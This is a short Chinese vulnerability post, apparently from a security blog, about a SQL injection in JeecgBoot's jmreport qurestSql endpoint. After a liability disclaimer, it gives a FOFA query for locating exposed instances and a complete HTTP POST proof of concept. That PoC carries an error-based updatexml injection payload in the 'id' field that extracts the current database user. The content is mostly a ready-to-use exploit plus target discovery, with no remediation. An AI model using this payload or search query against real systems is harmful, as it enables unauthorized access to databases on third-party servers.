免责声明
本文章只用于技术交流,若使用本文章提供的技术信息进行非法操作,后果均由使用者本人负责。
漏洞描述
JeecgBoot 企业级低代码平台 qurestSql存在SQL注入漏洞。
漏洞复现
fofa-query: app=”JeecgBoot-企业级低代码平台”
1.执行poc,进行当前用户查询
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1\' or \'%1%\' like (updatexml(0x3a,concat(1,(select current_user)),1)) or \'%%\' like \'\"}
暂无评论内容